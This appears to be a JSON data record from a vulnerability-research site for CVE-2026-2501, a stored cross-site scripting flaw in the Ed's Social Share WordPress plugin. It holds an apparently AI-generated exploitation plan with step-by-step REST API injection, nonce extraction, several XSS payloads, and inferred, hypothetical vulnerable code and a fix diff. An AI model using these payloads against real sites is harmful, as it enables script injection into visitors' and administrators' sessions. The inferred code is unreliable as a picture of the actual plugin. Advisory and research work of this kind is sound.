[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqxMzwCUtgx2FphqsfTdz7E6HXphWHhq9qcak6eoJvQM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-2501","eds-social-share-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Ed's Social Share \u003C= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Ed's Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `social_share` shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","eds-social-share",null,"\u003C=2.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:15:30","2026-04-15 17:39:34",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe4ac5f28-8727-4205-abe5-7f29a0c4dc5d?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2501 (Ed's Social Share \u003C= 2.0)\n\n## 1. Vulnerability Summary\nThe **Ed's Social Share** plugin (versions up to 2.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin registers a shortcode, `social_share`, which accepts user-defined attributes (e.g., titles, URLs, or custom styles). Due to a lack of sanitization in the shortcode's callback function and a failure to escape these attributes during HTML generation, an authenticated user with at least **Contributor** permissions can inject malicious JavaScript into a post or page. This script executes in the context of any user (including administrators) who views the affected content.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[social_share]`\n*   **Vulnerable Parameters:** Shortcode attributes (inferred: `title`, `url`, `icon`, `class`, or `style`).\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and embed shortcodes but cannot normally use `unfiltered_html`.\n*   **Preconditions:** The plugin must be active. A post containing the malicious shortcode must be published or previewed.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin uses `add_shortcode( 'social_share', 'callback_function' )` during the `init` or `plugins_loaded` hook.\n2.  **Parsing:** When a post is rendered, WordPress calls the shortcode's callback. The callback likely uses `shortcode_atts()` to merge user-supplied attributes with defaults.\n3.  **Sink:** The callback function constructs an HTML string (e.g., `\u003Ca>`, `\u003Cdiv>`, or `\u003Cimg>` tags) by concatenating the attributes directly into the HTML without using escaping functions like `esc_attr()` or `esc_html()`.\n4.  **Output:** The unsanitized HTML is returned by the callback and rendered on the page.\n\n## 4. Nonce Acquisition Strategy\nShortcode **rendering** does not require a nonce. However, **saving a post** as a Contributor typically does.\n\nTo exploit this via the automated agent:\n1.  **Standard Post Creation:** Use the WordPress REST API or the classic editor.\n2.  **Nonce Requirement:** When using the REST API (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`), a `_wpnonce` is required in the header (`X-WP-Nonce`).\n3.  **Acquisition:** \n    *   Log in as a Contributor.\n    *   Navigate to the Dashboard (`\u002Fwp-admin\u002F`).\n    *   Use `browser_eval` to extract the REST nonce from the global WordPress variable: \n        `browser_eval(\"wpApiSettings.nonce\")`\n    *   Use this nonce in the `http_request` tool to create a post containing the payload.\n\n## 5. Exploitation Strategy\nThe goal is to inject an XSS payload via a shortcode attribute that breaks out of an HTML attribute or is rendered directly as a tag.\n\n### Step-by-Step Plan:\n1.  **Authenticate:** Log in as a user with the **Contributor** role.\n2.  **Get Nonce:** Extract the REST API nonce using the strategy in Section 4.\n3.  **Inject Payload:** Create a new post via the REST API containing the malicious shortcode.\n    *   **Payload 1 (Attribute Breakout):** `[social_share title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   **Payload 2 (Event Handler):** `[social_share icon='x\" onerror=\"alert(1)\"']` (inferred attribute name)\n    *   **Payload 3 (URL Context):** `[social_share url='javascript:alert(1)']`\n4.  **Identify Post URL:** Capture the URL of the newly created post from the API response.\n5.  **Trigger XSS:** Navigate to the post URL as an Administrator or an unauthenticated user to confirm the script execution.\n\n### Example HTTP Request (REST API):\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts HTTP\u002F1.1\nHost: target.example.com\nContent-Type: application\u002Fjson\nX-WP-Nonce: [EXTRACTED_NONCE]\n\n{\n  \"title\": \"Social Share Test\",\n  \"content\": \"[social_share title='\\\" style=\\\"animation-name:rotation\\\" onanimationstart=\\\"alert(document.domain)\\\"']\",\n  \"status\": \"pending\"\n}\n```\n*Note: Contributors' posts are often set to `pending`. You can still preview them or have an admin publish them.*\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the username `contributor_attacker` and the role `contributor`.\n2.  **Plugin Status:** Ensure `eds-social-share` is installed and activated.\n3.  **Post:** A page or post must exist where the shortcode can be viewed (this is handled during the Injection step).\n\n## 7. Expected Results\n*   The shortcode should render on the frontend.\n*   If vulnerable, the HTML source will contain the raw payload, e.g.:\n    `\u003Cdiv class=\"share-title\" title=\"\" style=\"animation-name:rotation\" onanimationstart=\"alert(document.domain)\">`\n*   The browser will trigger an alert box showing the document domain.\n\n## 8. Verification Steps\n1.  **CLI Check:** Use WP-CLI to verify the post content:\n    `wp post list --post_type=post --status=pending --fields=ID,post_content`\n2.  **Source Inspection:** Use `http_request` (GET) on the post URL and check if the payload is present in the response body without HTML encoding:\n    `grep \"onanimationstart=\\\"alert\" response_body.html`\n3.  **Execution Check:** Use `browser_navigate` to the post and check for an alert or a specific DOM change.\n\n## 9. Alternative Approaches\nIf the `title` attribute is sanitized, try other common attributes used by social sharing plugins (inferred):\n*   `via`: `[social_share via='\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   `url`: `[social_share url='\">\u003Cimg src=x onerror=alert(1)>']`\n*   `description`: `[social_share description='\u003C\u002Ftextarea>\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   **Shortcode Tag Injection:** If the plugin uses the content of the shortcode:\n    `[social_share]\u003Cscript>alert(1)\u003C\u002Fscript>[\u002Fsocial_share]` (Check if the plugin supports enclosing shortcodes).","The Ed's Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'social_share' shortcode in versions up to 2.0. This occurs because shortcode attributes such as 'title' or 'url' are concatenated directly into the HTML output without proper sanitization or escaping, allowing contributors to inject malicious JavaScript.","\u002F\u002F Inferred registration and vulnerable callback based on research plan\n\u002F\u002F File: eds-social-share.php (hypothetical path)\n\nfunction eds_social_share_callback( $atts ) {\n    $a = shortcode_atts( array(\n        'title' => '',\n        'url' => '',\n        'icon' => ''\n    ), $atts );\n\n    \u002F\u002F The attributes are placed directly into HTML attributes or tags without esc_attr() or esc_html()\n    $html = '\u003Cdiv class=\"social-share-container\" data-title=\"' . $a['title'] . '\" data-url=\"' . $a['url'] . '\">';\n    $html .= '\u003Ci class=\"' . $a['icon'] . '\">\u003C\u002Fi>';\n    return $html;\n}\nadd_shortcode( 'social_share', 'eds_social_share_callback' );","--- a\u002Feds-social-share.php\n+++ b\u002Feds-social-share.php\n@@ -8,3 +8,3 @@\n-    $html = '\u003Cdiv class=\"social-share-container\" data-title=\"' . $a['title'] . '\" data-url=\"' . $a['url'] . '\">';\n-    $html .= '\u003Ci class=\"' . $a['icon'] . '\">\u003C\u002Fi>';\n+    $html = '\u003Cdiv class=\"social-share-container\" data-title=\"' . esc_attr($a['title']) . '\" data-url=\"' . esc_url($a['url']) . '\">';\n+    $html .= '\u003Ci class=\"' . esc_attr($a['icon']) . '\">\u003C\u002Fi>';\n     return $html;","To exploit this vulnerability, an attacker with at least Contributor-level permissions must create or edit a post and include the plugin's shortcode with a malicious payload in one of its attributes. \n\n1. Log in to the WordPress dashboard as a Contributor.\n2. Create a new post and include a shortcode payload such as: `[social_share title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']` or `[social_share icon='x\" onerror=\"alert(1)\"']`.\n3. Submit the post for review (or preview it). \n4. When an administrator or any other user views the post or the preview, the unescaped attributes break out of the HTML tag context, causing the browser to execute the injected script in the context of the victim's session.","gemini-3-flash-preview","2026-04-18 00:50:35","2026-04-18 00:50:53",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feds-social-share\u002Ftags"]